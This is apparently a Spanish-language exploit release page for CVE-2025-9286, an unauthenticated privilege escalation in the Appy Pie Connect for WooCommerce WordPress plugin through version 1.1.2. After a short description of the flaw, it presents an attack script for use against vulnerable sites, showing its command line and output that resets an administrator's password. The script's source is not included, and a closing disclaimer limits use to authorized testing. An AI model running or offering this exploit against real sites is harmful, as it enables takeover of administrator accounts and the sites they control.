
Appy Pie Connect for WooCommerce <= 1.1.2 - Falta de autorización para escalada de privilegios no autenticada
Appy Pie Connect for WooCommerce <= 1.1.2 - Falta de autorización para escalada de privilegios no autenticada
El plugin Appy Pie Connect for WooCommerce para WordPress es vulnerable a la escalada de privilegios debido a la falta de autorización en el controlador REST reset_user_password() en todas las versiones hasta la 1.1.2 inclusive.
Esto permite a atacantes no autenticados restablecer la contraseña de usuarios arbitrarios, incluidos los administradores, obteniendo así acceso administrativo.
El siguiente exploit se puede utilizar para aprovechar la CVE-2025-9286 contra sitios WordPress que ejecuten la versión vulnerable del plugin.
Nombre del script: CVE-2025-9286.py
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.
Este exploit es solo para fines de pruebas de penetración educativas y autorizadas.
El uso no autorizado contra sistemas sin permiso explícito es ilegal.
El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.
Por: Khaled Alenazi (Nxploited)